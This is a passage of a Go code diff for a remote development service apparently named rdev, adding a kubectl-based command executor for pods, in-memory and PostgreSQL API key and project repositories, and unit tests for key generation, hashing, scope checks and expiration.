Authenticate once, all project pods can use it:
```bash
./scripts/claude-auth.sh pantheon # Auth in any pod
# Now all pods share the credentials
```

View File

@ -0,0 +1,212 @@
// Package kubernetes provides Kubernetes-based implementations of port interfaces.
package kubernetes
import (
"bufio"
"context"
"fmt"
"io"
"os/exec"
"sync"
"time"
"github.com/orchard9/rdev/internal/domain"
"github.com/orchard9/rdev/internal/port"
)
// Executor implements port.CommandExecutor using kubectl exec.
type Executor struct {
namespace string
mu sync.RWMutex
// Track active commands for cancellation
activeCommands map[domain.CommandID]context.CancelFunc
activeMu sync.Mutex
}
// NewExecutor creates a new Kubernetes command executor.
func NewExecutor(namespace string) *Executor {
return &Executor{
namespace: namespace,
activeCommands: make(map[domain.CommandID]context.CancelFunc),
}
}
// Ensure Executor implements port.CommandExecutor at compile time.
var _ port.CommandExecutor = (*Executor)(nil)
// Execute runs a command in the target pod and streams output to the handler.
func (e *Executor) Execute(ctx context.Context, cmd *domain.Command, podName string, handler domain.OutputHandler) (*domain.CommandResult, error) {
e.mu.RLock()
namespace := e.namespace
e.mu.RUnlock()
// Create cancellable context for this command
cmdCtx, cancel := context.WithCancel(ctx)
defer cancel()
// Track for potential cancellation
e.activeMu.Lock()
e.activeCommands[cmd.ID] = cancel
e.activeMu.Unlock()
defer func() {
e.activeMu.Lock()
delete(e.activeCommands, cmd.ID)
e.activeMu.Unlock()
}()
startTime := time.Now()
var args []string
switch cmd.Type {
case domain.CommandTypeClaude:
// claude "prompt"
args = []string{
"exec", "-n", namespace, podName, "--",
"claude", cmd.Args[0], // prompt is first arg
}
case domain.CommandTypeShell:
// bash -c "command"
args = []string{
"exec", "-n", namespace, podName, "--",
"bash", "-c", cmd.Args[0], // command is first arg
}
case domain.CommandTypeGit:
// git <args...>
args = append([]string{
"exec", "-n", namespace, podName, "--",
"git", "-C", "/workspace",
}, cmd.Args...)
default:
return &domain.CommandResult{
CommandID: cmd.ID,
ExitCode: 1,
Error: fmt.Errorf("unknown command type: %s", cmd.Type),
}, nil
}
// Create the kubectl command
kubectl := exec.CommandContext(cmdCtx, "kubectl", args...)
// Get stdout and stderr pipes
stdout, err := kubectl.StdoutPipe()
if err != nil {
return &domain.CommandResult{
CommandID: cmd.ID,
ExitCode: 1,
Error: fmt.Errorf("stdout pipe: %w", err),
}, nil
}
stderr, err := kubectl.StderrPipe()
if err != nil {
return &domain.CommandResult{
CommandID: cmd.ID,
ExitCode: 1,
Error: fmt.Errorf("stderr pipe: %w", err),
}, nil
}
// Start the command
if err := kubectl.Start(); err != nil {
return &domain.CommandResult{
CommandID: cmd.ID,
ExitCode: 1,
Error: fmt.Errorf("start: %w", err),
}, nil
}
// Stream output concurrently
var wg sync.WaitGroup
wg.Add(2)
go func() {
defer wg.Done()
streamOutput(stdout, "stdout", handler)
}()
go func() {
defer wg.Done()
streamOutput(stderr, "stderr", handler)
}()
// Wait for output to be consumed
wg.Wait()
// Wait for command to complete
err = kubectl.Wait()
duration := time.Since(startTime)
result := &domain.CommandResult{
CommandID: cmd.ID,
DurationMs: duration.Milliseconds(),
}
if err != nil {
if exitError, ok := err.(*exec.ExitError); ok {
result.ExitCode = exitError.ExitCode()
} else {
result.ExitCode = 1
result.Error = err
}
}
return result, nil
}
// streamOutput reads from a reader and sends each line to the handler.
func streamOutput(r io.Reader, stream string, handler domain.OutputHandler) {
scanner := bufio.NewScanner(r)
// Increase buffer size for long lines
buf := make([]byte, 0, 64*1024)
scanner.Buffer(buf, 1024*1024)
for scanner.Scan() {
handler(domain.OutputLine{
Stream: stream,
Line: scanner.Text(),
Timestamp: time.Now(),
})
}
}
// Cancel attempts to cancel a running command.
func (e *Executor) Cancel(ctx context.Context, cmdID domain.CommandID) error {
e.activeMu.Lock()
defer e.activeMu.Unlock()
cancel, exists := e.activeCommands[cmdID]
if !exists {
return domain.ErrCommandNotFound
}
cancel()
return nil
}
// PodExists checks if a pod exists and is running.
func (e *Executor) PodExists(ctx context.Context, podName string) (bool, error) {
e.mu.RLock()
namespace := e.namespace
e.mu.RUnlock()
cmd := exec.CommandContext(ctx, "kubectl",
"get", "pod", podName,
"-n", namespace,
"-o", "jsonpath={.status.phase}",
)
output, err := cmd.Output()
if err != nil {
// Pod doesn't exist or error
return false, nil
}
return string(output) == "Running", nil
}
// CheckConnection verifies connectivity to the Kubernetes cluster.
func (e *Executor) CheckConnection(ctx context.Context) error {
cmd := exec.CommandContext(ctx, "kubectl", "cluster-info", "--request-timeout=5s")
return cmd.Run()
}

View File

@ -0,0 +1,150 @@
package memory
import (
"context"
"sync"
"time"
"github.com/orchard9/rdev/internal/domain"
"github.com/orchard9/rdev/internal/port"
)
// APIKeyRepository is an in-memory implementation of port.APIKeyRepository.
type APIKeyRepository struct {
keys map[domain.APIKeyID]*domain.APIKey
keysByHash map[string]domain.APIKeyID
nextID int
mu sync.RWMutex
}
// NewAPIKeyRepository creates a new in-memory API key repository.
func NewAPIKeyRepository() *APIKeyRepository {
return &APIKeyRepository{
keys: make(map[domain.APIKeyID]*domain.APIKey),
keysByHash: make(map[string]domain.APIKeyID),
}
}
// Ensure APIKeyRepository implements port.APIKeyRepository at compile time.
var _ port.APIKeyRepository = (*APIKeyRepository)(nil)
// Create stores a new API key.
func (r *APIKeyRepository) Create(ctx context.Context, key *domain.APIKey, keyHash string) error {
r.mu.Lock()
defer r.mu.Unlock()
r.nextID++
key.ID = domain.APIKeyID(itoa(r.nextID))
key.CreatedAt = time.Now()
// Store the key
r.keys[key.ID] = key
r.keysByHash[keyHash] = key.ID
return nil
}
// GetByHash retrieves an API key by its hash.
func (r *APIKeyRepository) GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error) {
r.mu.RLock()
defer r.mu.RUnlock()
id, ok := r.keysByHash[keyHash]
if !ok {
return nil, domain.ErrKeyNotFound
}
key, ok := r.keys[id]
if !ok {
return nil, domain.ErrKeyNotFound
}
return key, nil
}
// Get retrieves an API key by ID.
func (r *APIKeyRepository) Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error) {
r.mu.RLock()
defer r.mu.RUnlock()
key, ok := r.keys[id]
if !ok {
return nil, domain.ErrKeyNotFound
}
return key, nil
}
// List returns all API keys (without secrets).
func (r *APIKeyRepository) List(ctx context.Context) ([]*domain.APIKey, error) {
r.mu.RLock()
defer r.mu.RUnlock()
keys := make([]*domain.APIKey, 0, len(r.keys))
for _, key := range r.keys {
keys = append(keys, key)
}
return keys, nil
}
// Revoke marks an API key as revoked.
func (r *APIKeyRepository) Revoke(ctx context.Context, id domain.APIKeyID) error {
r.mu.Lock()
defer r.mu.Unlock()
key, ok := r.keys[id]
if !ok {
return domain.ErrKeyNotFound
}
if key.RevokedAt != nil {
return domain.ErrKeyNotFound
}
now := time.Now()
key.RevokedAt = &now
return nil
}
// UpdateLastUsed updates the last used timestamp for a key.
func (r *APIKeyRepository) UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error {
r.mu.Lock()
defer r.mu.Unlock()
key, ok := r.keys[id]
if !ok {
return domain.ErrKeyNotFound
}
now := time.Now()
key.LastUsedAt = &now
return nil
}
// itoa converts an integer to a string.
func itoa(i int) string {
if i == 0 {
return "0"
}
var buf [20]byte
pos := len(buf)
negative := i < 0
if negative {
i = -i
}
for i > 0 {
pos--
buf[pos] = byte('0' + i%10)
i /= 10
}
if negative {
pos--
buf[pos] = '-'
}
return string(buf[pos:])
}

View File

@ -0,0 +1,93 @@
// Package memory provides in-memory implementations of port interfaces for testing.
package memory
import (
"context"
"sync"
"github.com/orchard9/rdev/internal/domain"
"github.com/orchard9/rdev/internal/port"
)
// ProjectRepository is an in-memory implementation of port.ProjectRepository.
type ProjectRepository struct {
projects map[domain.ProjectID]*domain.Project
mu sync.RWMutex
}
// NewProjectRepository creates a new in-memory project repository.
func NewProjectRepository() *ProjectRepository {
return &ProjectRepository{
projects: make(map[domain.ProjectID]*domain.Project),
}
}
// Ensure ProjectRepository implements port.ProjectRepository at compile time.
var _ port.ProjectRepository = (*ProjectRepository)(nil)
// List returns all available projects.
func (r *ProjectRepository) List(ctx context.Context) ([]domain.Project, error) {
r.mu.RLock()
defer r.mu.RUnlock()
projects := make([]domain.Project, 0, len(r.projects))
for _, p := range r.projects {
projects = append(projects, *p)
}
return projects, nil
}
// Get returns a project by ID.
func (r *ProjectRepository) Get(ctx context.Context, id domain.ProjectID) (*domain.Project, error) {
r.mu.RLock()
defer r.mu.RUnlock()
p, ok := r.projects[id]
if !ok {
return nil, domain.ErrProjectNotFound
}
return p, nil
}
// Exists checks if a project exists.
func (r *ProjectRepository) Exists(ctx context.Context, id domain.ProjectID) (bool, error) {
r.mu.RLock()
defer r.mu.RUnlock()
_, ok := r.projects[id]
return ok, nil
}
// Register adds a new project to the repository.
func (r *ProjectRepository) Register(ctx context.Context, project *domain.Project) error {
r.mu.Lock()
defer r.mu.Unlock()
r.projects[project.ID] = project
return nil
}
// Unregister removes a project from the repository.
func (r *ProjectRepository) Unregister(ctx context.Context, id domain.ProjectID) error {
r.mu.Lock()
defer r.mu.Unlock()
delete(r.projects, id)
return nil
}
// RefreshStatus updates the status of all projects.
// For the in-memory implementation, this is a no-op.
func (r *ProjectRepository) RefreshStatus(ctx context.Context) error {
return nil
}
// SetStatus is a test helper to set a project's status.
func (r *ProjectRepository) SetStatus(id domain.ProjectID, status domain.ProjectStatus) {
r.mu.Lock()
defer r.mu.Unlock()
if p, ok := r.projects[id]; ok {
p.Status = status
}
}

View File

@ -0,0 +1,86 @@
package memory
import (
"sync"
"github.com/orchard9/rdev/internal/port"
)
// StreamPublisher is an in-memory implementation of port.StreamPublisher.
type StreamPublisher struct {
mu sync.RWMutex
streams map[string][]chan port.StreamEvent
}
// NewStreamPublisher creates a new in-memory stream publisher.
func NewStreamPublisher() *StreamPublisher {
return &StreamPublisher{
streams: make(map[string][]chan port.StreamEvent),
}
}
// Ensure StreamPublisher implements port.StreamPublisher at compile time.
var _ port.StreamPublisher = (*StreamPublisher)(nil)
// Subscribe creates a subscription to events for the given stream ID.
func (sp *StreamPublisher) Subscribe(streamID string) (<-chan port.StreamEvent, func()) {
sp.mu.Lock()
defer sp.mu.Unlock()
ch := make(chan port.StreamEvent, 100)
sp.streams[streamID] = append(sp.streams[streamID], ch)
// Return cleanup function
cleanup := func() {
sp.unsubscribe(streamID, ch)
}
return ch, cleanup
}
func (sp *StreamPublisher) unsubscribe(streamID string, ch chan port.StreamEvent) {
sp.mu.Lock()
defer sp.mu.Unlock()
channels := sp.streams[streamID]
for i, c := range channels {
if c == ch {
sp.streams[streamID] = append(channels[:i], channels[i+1:]...)
close(ch)
break
}
}
}
// Publish sends an event to all subscribers of a stream.
func (sp *StreamPublisher) Publish(streamID string, event port.StreamEvent) {
sp.mu.RLock()
defer sp.mu.RUnlock()
for _, ch := range sp.streams[streamID] {
select {
case ch <- event:
default:
// Channel full, skip
}
}
}
// Close closes a stream and all its subscriptions.
func (sp *StreamPublisher) Close(streamID string) {
sp.mu.Lock()
defer sp.mu.Unlock()
for _, ch := range sp.streams[streamID] {
close(ch)
}
delete(sp.streams, streamID)
}
// SubscriberCount returns the number of subscribers for a stream (for testing).
func (sp *StreamPublisher) SubscriberCount(streamID string) int {
sp.mu.RLock()
defer sp.mu.RUnlock()
return len(sp.streams[streamID])
}

View File

@ -0,0 +1,240 @@
// Package postgres provides PostgreSQL-based implementations of port interfaces.
package postgres
import (
"context"
"database/sql"
"errors"
"fmt"
"time"
"github.com/lib/pq"
"github.com/orchard9/rdev/internal/domain"
"github.com/orchard9/rdev/internal/port"
)
// APIKeyRepository implements port.APIKeyRepository using PostgreSQL.
type APIKeyRepository struct {
db *sql.DB
}
// NewAPIKeyRepository creates a new PostgreSQL API key repository.
func NewAPIKeyRepository(db *sql.DB) *APIKeyRepository {
return &APIKeyRepository{db: db}
}
// Ensure APIKeyRepository implements port.APIKeyRepository at compile time.
var _ port.APIKeyRepository = (*APIKeyRepository)(nil)
// Create stores a new API key.
func (r *APIKeyRepository) Create(ctx context.Context, key *domain.APIKey, keyHash string) error {
scopeStrings := scopesToStrings(key.Scopes)
projectIDStrings := projectIDsToStrings(key.ProjectIDs)
var id string
err := r.db.QueryRowContext(ctx, `
INSERT INTO api_keys (name, key_hash, key_prefix, scopes, project_ids, expires_at, created_by)
VALUES ($1, $2, $3, $4, $5, $6, $7)
RETURNING id
`, key.Name, keyHash, key.KeyPrefix, pq.Array(scopeStrings), pq.Array(projectIDStrings), key.ExpiresAt, key.CreatedBy).Scan(&id)
if err != nil {
return fmt.Errorf("insert key: %w", err)
}
key.ID = domain.APIKeyID(id)
key.CreatedAt = time.Now()
return nil
}
// GetByHash retrieves an API key by its hash.
func (r *APIKeyRepository) GetByHash(ctx context.Context, keyHash string) (*domain.APIKey, error) {
var (
key domain.APIKey
id string
scopeStrings []string
projectIDs []string
)
err := r.db.QueryRowContext(ctx, `
SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by
FROM api_keys
WHERE key_hash = $1
`, keyHash).Scan(
&id,
&key.Name,
&key.KeyPrefix,
pq.Array(&scopeStrings),
pq.Array(&projectIDs),
&key.CreatedAt,
&key.ExpiresAt,
&key.LastUsedAt,
&key.RevokedAt,
&key.CreatedBy,
)
if errors.Is(err, sql.ErrNoRows) {
return nil, domain.ErrKeyNotFound
}
if err != nil {
return nil, fmt.Errorf("query key: %w", err)
}
key.ID = domain.APIKeyID(id)
key.Scopes = scopesFromStrings(scopeStrings)
key.ProjectIDs = projectIDsFromStrings(projectIDs)
return &key, nil
}
// Get retrieves an API key by ID.
func (r *APIKeyRepository) Get(ctx context.Context, id domain.APIKeyID) (*domain.APIKey, error) {
var (
key domain.APIKey
keyID string
scopeStrings []string
projectIDs []string
)
err := r.db.QueryRowContext(ctx, `
SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by
FROM api_keys
WHERE id = $1
`, string(id)).Scan(
&keyID,
&key.Name,
&key.KeyPrefix,
pq.Array(&scopeStrings),
pq.Array(&projectIDs),
&key.CreatedAt,
&key.ExpiresAt,
&key.LastUsedAt,
&key.RevokedAt,
&key.CreatedBy,
)
if errors.Is(err, sql.ErrNoRows) {
return nil, domain.ErrKeyNotFound
}
if err != nil {
return nil, fmt.Errorf("query key: %w", err)
}
key.ID = domain.APIKeyID(keyID)
key.Scopes = scopesFromStrings(scopeStrings)
key.ProjectIDs = projectIDsFromStrings(projectIDs)
return &key, nil
}
// List returns all API keys (without secrets).
func (r *APIKeyRepository) List(ctx context.Context) ([]*domain.APIKey, error) {
rows, err := r.db.QueryContext(ctx, `
SELECT id, name, key_prefix, scopes, project_ids, created_at, expires_at, last_used_at, revoked_at, created_by
FROM api_keys
ORDER BY created_at DESC
`)
if err != nil {
return nil, fmt.Errorf("query keys: %w", err)
}
defer rows.Close()
var keys []*domain.APIKey
for rows.Next() {
var (
key domain.APIKey
id string
scopeStrings []string
projectIDs []string
)
if err := rows.Scan(
&id,
&key.Name,
&key.KeyPrefix,
pq.Array(&scopeStrings),
pq.Array(&projectIDs),
&key.CreatedAt,
&key.ExpiresAt,
&key.LastUsedAt,
&key.RevokedAt,
&key.CreatedBy,
); err != nil {
return nil, fmt.Errorf("scan key: %w", err)
}
key.ID = domain.APIKeyID(id)
key.Scopes = scopesFromStrings(scopeStrings)
key.ProjectIDs = projectIDsFromStrings(projectIDs)
keys = append(keys, &key)
}
return keys, nil
}
// Revoke marks an API key as revoked.
func (r *APIKeyRepository) Revoke(ctx context.Context, id domain.APIKeyID) error {
result, err := r.db.ExecContext(ctx, `
UPDATE api_keys SET revoked_at = NOW()
WHERE id = $1 AND revoked_at IS NULL
`, string(id))
if err != nil {
return fmt.Errorf("revoke key: %w", err)
}
rows, err := result.RowsAffected()
if err != nil {
return fmt.Errorf("rows affected: %w", err)
}
if rows == 0 {
return domain.ErrKeyNotFound
}
return nil
}
// UpdateLastUsed updates the last used timestamp for a key.
func (r *APIKeyRepository) UpdateLastUsed(ctx context.Context, id domain.APIKeyID) error {
_, err := r.db.ExecContext(ctx, `
UPDATE api_keys SET last_used_at = NOW() WHERE id = $1
`, string(id))
return err
}
// Helper functions for scope conversion
func scopesToStrings(scopes []domain.Scope) []string {
ss := make([]string, len(scopes))
for i, s := range scopes {
ss[i] = string(s)
}
return ss
}
func scopesFromStrings(ss []string) []domain.Scope {
scopes := make([]domain.Scope, len(ss))
for i, s := range ss {
scopes[i] = domain.Scope(s)
}
return scopes
}
func projectIDsToStrings(ids []domain.ProjectID) []string {
if ids == nil {
return nil
}
ss := make([]string, len(ids))
for i, id := range ids {
ss[i] = string(id)
}
return ss
}
func projectIDsFromStrings(ss []string) []domain.ProjectID {
if ss == nil {
return nil
}
ids := make([]domain.ProjectID, len(ss))
for i, s := range ss {
ids[i] = domain.ProjectID(s)
}
return ids
}

203
internal/auth/keys_test.go Normal file
View File

@ -0,0 +1,203 @@
package auth
import (
"testing"
"time"
)
func TestParseExpiration(t *testing.T) {
tests := []struct {
name string
input string
want time.Duration
wantErr bool
}{
{"30d", "30d", Expiration30Days, false},
{"30", "30", Expiration30Days, false},
{"60d", "60d", Expiration60Days, false},
{"60", "60", Expiration60Days, false},
{"90d", "90d", Expiration90Days, false},
{"90", "90", Expiration90Days, false},
{"1y", "1y", Expiration1Year, false},
{"1year", "1year", Expiration1Year, false},
{"365d", "365d", Expiration1Year, false},
{"never", "never", ExpirationNoLimit, false},
{"none", "none", ExpirationNoLimit, false},
{"empty", "", ExpirationNoLimit, false},
{"case insensitive", "30D", Expiration30Days, false},
{"invalid", "invalid", 0, true},
{"7d", "7d", 0, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got, err := ParseExpiration(tt.input)
if (err != nil) != tt.wantErr {
t.Errorf("ParseExpiration(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
return
}
if got != tt.want {
t.Errorf("ParseExpiration(%q) = %v, want %v", tt.input, got, tt.want)
}
})
}
}
func TestExpiresAt(t *testing.T) {
t.Run("returns nil for zero duration", func(t *testing.T) {
got := ExpiresAt(0)
if got != nil {
t.Errorf("ExpiresAt(0) = %v, want nil", got)
}
})
t.Run("returns future time for positive duration", func(t *testing.T) {
before := time.Now()
got := ExpiresAt(24 * time.Hour)
after := time.Now()
if got == nil {
t.Fatal("ExpiresAt(24h) returned nil")
}
expectedMin := before.Add(24 * time.Hour)
expectedMax := after.Add(24 * time.Hour)
if got.Before(expectedMin) || got.After(expectedMax) {
t.Errorf("ExpiresAt(24h) = %v, want between %v and %v", *got, expectedMin, expectedMax)
}
})
}
func TestGenerateKey(t *testing.T) {
t.Run("generates unique keys", func(t *testing.T) {
key1, id1, err := GenerateKey()
if err != nil {
t.Fatalf("GenerateKey() error = %v", err)
}
key2, id2, err := GenerateKey()
if err != nil {
t.Fatalf("GenerateKey() error = %v", err)
}
if key1 == key2 {
t.Error("Generated keys should be unique")
}
if id1 == id2 {
t.Error("Generated identifiers should be unique")
}
})
t.Run("key has correct format", func(t *testing.T) {
key, id, err := GenerateKey()
if err != nil {
t.Fatalf("GenerateKey() error = %v", err)
}
if !ValidateKeyFormat(key) {
t.Errorf("Generated key %q has invalid format", key)
}
if len(id) != KeyIdentifierLength {
t.Errorf("Identifier length = %d, want %d", len(id), KeyIdentifierLength)
}
})
t.Run("key contains prefix and identifier", func(t *testing.T) {
key, id, err := GenerateKey()
if err != nil {
t.Fatalf("GenerateKey() error = %v", err)
}
expectedPrefix := KeyPrefix + id + "_"
if key[:len(expectedPrefix)] != expectedPrefix {
t.Errorf("Key %q should start with %q", key, expectedPrefix)
}
})
}
func TestHashKey(t *testing.T) {
t.Run("produces consistent hash", func(t *testing.T) {
key := "rdev_sk_abc12345_0123456789abcdef0123456789abcdef"
hash1 := HashKey(key)
hash2 := HashKey(key)
if hash1 != hash2 {
t.Error("Same key should produce same hash")
}
})
t.Run("different keys produce different hashes", func(t *testing.T) {
hash1 := HashKey("key1")
hash2 := HashKey("key2")
if hash1 == hash2 {
t.Error("Different keys should produce different hashes")
}
})
t.Run("hash is hex encoded", func(t *testing.T) {
hash := HashKey("test")
// SHA-256 produces 32 bytes = 64 hex characters
if len(hash) != 64 {
t.Errorf("Hash length = %d, want 64", len(hash))
}
for _, c := range hash {
if !((c >= '0' && c <= '9') || (c >= 'a' && c <= 'f')) {
t.Errorf("Hash contains non-hex character: %c", c)
}
}
})
}
func TestValidateKeyFormat(t *testing.T) {
tests := []struct {
name string
key string
want bool
}{
{"valid key", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef", true},
{"missing prefix", "abc12345_0123456789abcdef0123456789abcdef", false},
{"wrong prefix", "api_sk_abc12345_0123456789abcdef0123456789abcdef", false},
{"short identifier", "rdev_sk_abc1234_0123456789abcdef0123456789abcdef", false},
{"long identifier", "rdev_sk_abc123456_0123456789abcdef0123456789abcdef", false},
{"short random", "rdev_sk_abc12345_0123456789abcdef", false},
{"long random", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef00", false},
{"missing underscore", "rdev_sk_abc123450123456789abcdef0123456789abcdef", false},
{"extra underscore", "rdev_sk_abc12345_0123_456789abcdef0123456789abcdef", false},
{"empty", "", false},
{"only prefix", "rdev_sk_", false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := ValidateKeyFormat(tt.key); got != tt.want {
t.Errorf("ValidateKeyFormat(%q) = %v, want %v", tt.key, got, tt.want)
}
})
}
}
func TestExtractPrefix(t *testing.T) {
tests := []struct {
name string
key string
want string
}{
{"valid key", "rdev_sk_abc12345_0123456789abcdef0123456789abcdef", "abc12345"},
{"missing prefix", "abc12345_random", ""},
{"only rdev_sk_", "rdev_sk_", ""},
{"empty", "", ""},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := ExtractPrefix(tt.key); got != tt.want {
t.Errorf("ExtractPrefix(%q) = %q, want %q", tt.key, got, tt.want)
}
})
}
}

View File

@ -25,6 +25,12 @@ func GetAPIKey(ctx context.Context) *APIKey {
return key
}
// WithAPIKey returns a context with the given API key set.
// This is primarily useful for testing.
func WithAPIKey(ctx context.Context, apiKey *APIKey) context.Context {
return context.WithValue(ctx, contextKeyAPIKey, apiKey)
}
// Middleware creates an authentication middleware.
func Middleware(svc *Service) func(http.Handler) http.Handler {
return func(next http.Handler) http.Handler {

View File

@ -0,0 +1,155 @@
package auth
import (
"testing"
)
func TestScopeIsValid(t *testing.T) {
tests := []struct {
name string
scope Scope
want bool
}{
{"projects:read", ScopeProjectsRead, true},
{"projects:execute", ScopeProjectsExecute, true},
{"keys:read", ScopeKeysRead, true},
{"keys:write", ScopeKeysWrite, true},
{"admin", ScopeAdmin, true},
{"invalid", Scope("invalid"), false},
{"empty", Scope(""), false},
{"similar", Scope("projects:write"), false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := tt.scope.IsValid(); got != tt.want {
t.Errorf("Scope(%q).IsValid() = %v, want %v", tt.scope, got, tt.want)
}
})
}
}
func TestScopesFromStrings(t *testing.T) {
input := []string{"projects:read", "keys:write"}
got := ScopesFromStrings(input)
if len(got) != 2 {
t.Fatalf("ScopesFromStrings() returned %d scopes, want 2", len(got))
}
if got[0] != ScopeProjectsRead {
t.Errorf("got[0] = %v, want %v", got[0], ScopeProjectsRead)
}
if got[1] != ScopeKeysWrite {
t.Errorf("got[1] = %v, want %v", got[1], ScopeKeysWrite)
}
}
func TestScopesToStrings(t *testing.T) {
input := []Scope{ScopeProjectsRead, ScopeKeysWrite}
got := ScopesToStrings(input)
if len(got) != 2 {
t.Fatalf("ScopesToStrings() returned %d strings, want 2", len(got))
}
if got[0] != "projects:read" {
t.Errorf("got[0] = %q, want %q", got[0], "projects:read")
}
if got[1] != "keys:write" {
t.Errorf("got[1] = %q, want %q", got[1], "keys:write")
}
}
func TestValidateScopes(t *testing.T) {
tests := []struct {
name string
scopes []Scope
want bool
}{
{"all valid", []Scope{ScopeProjectsRead, ScopeKeysWrite}, true},
{"single valid", []Scope{ScopeAdmin}, true},
{"empty", []Scope{}, true},
{"one invalid", []Scope{ScopeProjectsRead, Scope("invalid")}, false},
{"all invalid", []Scope{Scope("foo"), Scope("bar")}, false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := ValidateScopes(tt.scopes); got != tt.want {
t.Errorf("ValidateScopes() = %v, want %v", got, tt.want)
}
})
}
}
func TestHasScope(t *testing.T) {
tests := []struct {
name string
scopes []Scope
required Scope
want bool
}{
{"has exact scope", []Scope{ScopeProjectsRead, ScopeKeysRead}, ScopeProjectsRead, true},
{"admin grants all", []Scope{ScopeAdmin}, ScopeProjectsRead, true},
{"admin grants keys", []Scope{ScopeAdmin}, ScopeKeysWrite, true},
{"missing scope", []Scope{ScopeProjectsRead}, ScopeKeysWrite, false},
{"empty scopes", []Scope{}, ScopeProjectsRead, false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := HasScope(tt.scopes, tt.required); got != tt.want {
t.Errorf("HasScope() = %v, want %v", got, tt.want)
}
})
}
}
func TestHasAnyScope(t *testing.T) {
tests := []struct {
name string
scopes []Scope
required []Scope
want bool
}{
{"has first", []Scope{ScopeProjectsRead}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true},
{"has second", []Scope{ScopeKeysRead}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true},
{"has neither", []Scope{ScopeKeysWrite}, []Scope{ScopeProjectsRead, ScopeKeysRead}, false},
{"admin grants any", []Scope{ScopeAdmin}, []Scope{ScopeProjectsRead, ScopeKeysRead}, true},
{"empty required", []Scope{ScopeProjectsRead}, []Scope{}, false},
{"empty scopes", []Scope{}, []Scope{ScopeProjectsRead}, false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := HasAnyScope(tt.scopes, tt.required...); got != tt.want {
t.Errorf("HasAnyScope() = %v, want %v", got, tt.want)
}
})
}
}
func TestHasProjectAccess(t *testing.T) {
tests := []struct {
name string
allowed []string
project string
want bool
}{
{"nil allows all", nil, "any-project", true},
{"in list", []string{"proj-a", "proj-b"}, "proj-a", true},
{"not in list", []string{"proj-a", "proj-b"}, "proj-c", false},
{"empty list denies", []string{}, "proj-a", false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := HasProjectAccess(tt.allowed, tt.project); got != tt.want {
t.Errorf("HasProjectAccess() = %v, want %v", got, tt.want)
}
})
}
}

View File

@ -0,0 +1,394 @@
package auth
import (
"context"
"fmt"
"testing"
"time"
"github.com/orchard9/rdev/internal/testutil"
)
func TestAPIKey_IsExpired(t *testing.T) {
now := time.Now()
past := now.Add(-1 * time.Hour)
future := now.Add(1 * time.Hour)
tests := []struct {
name string
key *APIKey
want bool
}{
{"nil expiration", &APIKey{ExpiresAt: nil}, false},
{"expired", &APIKey{ExpiresAt: &past}, true},
{"not expired", &APIKey{ExpiresAt: &future}, false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := tt.key.IsExpired(); got != tt.want {
t.Errorf("IsExpired() = %v, want %v", got, tt.want)
}
})
}
}
func TestAPIKey_IsRevoked(t *testing.T) {
now := time.Now()
tests := []struct {
name string
key *APIKey
want bool
}{
{"not revoked", &APIKey{RevokedAt: nil}, false},
{"revoked", &APIKey{RevokedAt: &now}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := tt.key.IsRevoked(); got != tt.want {
t.Errorf("IsRevoked() = %v, want %v", got, tt.want)
}
})
}
}
func TestAPIKey_IsActive(t *testing.T) {
now := time.Now()
past := now.Add(-1 * time.Hour)
future := now.Add(1 * time.Hour)
tests := []struct {
name string
key *APIKey
want bool
}{
{"active", &APIKey{ExpiresAt: &future, RevokedAt: nil}, true},
{"expired", &APIKey{ExpiresAt: &past, RevokedAt: nil}, false},
{"revoked", &APIKey{ExpiresAt: &future, RevokedAt: &now}, false},
{"never expires", &APIKey{ExpiresAt: nil, RevokedAt: nil}, true},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := tt.key.IsActive(); got != tt.want {
t.Errorf("IsActive() = %v, want %v", got, tt.want)
}
})
}
}
func TestService_IsAdminKey(t *testing.T) {
svc := NewService(nil, "admin-secret")
tests := []struct {
name string
key string
want bool
}{
{"matches admin key", "admin-secret", true},
{"wrong key", "wrong-key", false},
{"empty key", "", false},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := svc.IsAdminKey(tt.key); got != tt.want {
t.Errorf("IsAdminKey(%q) = %v, want %v", tt.key, got, tt.want)
}
})
}
}
func TestService_IsAdminKey_NoAdminKey(t *testing.T) {
svc := NewService(nil, "")
if svc.IsAdminKey("anything") {
t.Error("IsAdminKey should return false when no admin key is set")
}
}
// Integration tests - require database
func TestService_Create(t *testing.T) {
db := testutil.TestDB(t)
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
svc := NewService(db, "admin-key")
t.Run("creates key with valid scopes", func(t *testing.T) {
resp, err := svc.Create(context.Background(), CreateKeyRequest{
Name: "test-key-1",
Scopes: []Scope{ScopeProjectsRead},
ExpiresIn: 24 * time.Hour,
CreatedBy: "test",
})
if err != nil {
t.Fatalf("Create() error = %v", err)
}
if resp.Secret == "" {
t.Error("Create() returned empty secret")
}
if !ValidateKeyFormat(resp.Secret) {
t.Errorf("Create() returned invalid key format: %q", resp.Secret)
}
if resp.Key.Name != "test-key-1" {
t.Errorf("Key.Name = %q, want %q", resp.Key.Name, "test-key-1")
}
if len(resp.Key.Scopes) != 1 || resp.Key.Scopes[0] != ScopeProjectsRead {
t.Errorf("Key.Scopes = %v, want [%v]", resp.Key.Scopes, ScopeProjectsRead)
}
